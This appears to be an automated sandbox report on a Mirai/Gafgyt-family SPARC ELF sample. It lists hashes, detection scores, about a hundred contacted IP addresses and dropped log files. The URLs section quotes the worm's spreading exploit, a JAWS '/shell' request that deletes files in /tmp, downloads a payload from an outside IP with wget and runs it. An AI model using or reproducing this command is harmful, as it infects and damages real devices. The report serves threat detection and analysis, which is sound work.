=
flash

SLdtSSVlj2

Status: finished
Submission Time: 15.01.2022 00:22:13
Malicious
Spreader
Trojan
Gafgyt Mirai

Comments

Tags

  • 32
  • elf
  • mirai
  • sparc

Details

  • Analysis ID:
    553479
  • API (Web) ID:
    921000
  • Analysis Started:
    15.01.2022 00:44:21
  • Analysis Finished:
    15.01.2022 00:49:34
  • MD5:
    6b355f508658f7fbe9c91fad5d09d6b5
  • SHA1:
    72a9d43e568016e0384a39e391391498695328bd
  • SHA256:
    9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

malicious
100/100

malicious
32/60

malicious
27/43

IPs

IP Country Detection
156.105.187.203
United States
143.73.37.90
United States
23.112.136.211
United States
Click to see the 97 hidden entries
65.127.38.165
United States
8.43.89.79
United States
223.7.246.150
China
81.53.39.132
France
157.159.2.10
France
85.94.181.108
Andorra
84.93.195.206
United Kingdom
117.53.0.207
Japan
49.142.216.66
Korea Republic of
98.73.120.251
United States
213.211.198.3
Germany
219.103.245.214
Japan
111.130.217.227
China
4.76.23.211
United States
211.10.223.182
Japan
47.99.127.89
China
46.116.224.198
Israel
58.4.23.157
Japan
195.254.204.141
Norway
12.51.215.185
United States
77.38.175.50
Latvia
141.7.4.238
Germany
106.40.39.9
China
153.103.147.76
United States
120.38.218.114
China
190.242.223.55
Colombia
210.34.243.63
China
109.124.205.206
Russian Federation
39.169.69.182
China
143.95.243.22
United States
178.48.33.205
Hungary
118.221.156.95
Korea Republic of
93.47.233.169
Italy
117.53.204.29
Korea Republic of
106.130.151.96
Japan
53.71.60.182
Germany
206.189.21.127
United States
188.97.76.226
Germany
139.106.192.0
Norway
167.165.177.98
United States
24.200.77.29
Canada
47.240.52.241
United States
111.41.154.180
China
39.41.6.181
Pakistan
97.208.98.77
United States
178.181.134.183
Poland
45.177.55.212
El Salvador
5.18.76.220
Russian Federation
136.73.59.246
United States
216.14.205.189
Australia
206.132.0.140
United States
198.63.62.42
United States
134.106.195.170
Germany
152.187.199.199
United States
37.192.174.66
Russian Federation
116.209.105.167
China
183.244.15.145
China
175.152.186.231
China
142.32.230.217
Canada
4.89.195.39
United States
210.173.247.82
Japan
198.248.158.135
United States
85.240.148.176
Portugal
62.207.18.187
Netherlands
170.251.162.210
United States
36.105.37.71
China
138.92.199.12
United States
155.92.185.225
United States
77.123.221.2
Russian Federation
198.198.81.55
United States
96.220.159.13
United States
200.206.126.94
Brazil
98.255.78.152
United States
170.232.16.113
United States
38.142.127.80
United States
111.4.64.167
China
77.9.31.137
Germany
140.135.133.43
Taiwan; Republic of China (ROC)
147.20.20.62
United States
130.119.254.111
United States
222.93.139.47
China
156.115.201.253
Switzerland
154.27.167.245
United States
58.146.33.202
Japan
27.142.144.254
Japan
120.72.61.112
China
143.197.76.38
United States
44.223.80.47
United States
73.211.187.52
United States
162.179.208.90
United States
210.143.214.206
Japan
92.185.105.33
France
66.71.205.67
United States
119.153.46.164
Pakistan
219.128.232.14
China
39.87.126.183
China
52.144.33.89
United States

URLs

Name Detection
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name File Type Hashes Detection
/var/lib/whoopsie/whoopsie-id.02WAG1
ASCII text, with no line terminators
#
/var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal
data
#
/var/log/kern.log
ASCII text, with very long lines
#
Click to see the 1 hidden entries
/var/log/syslog
ASCII text, with very long lines
#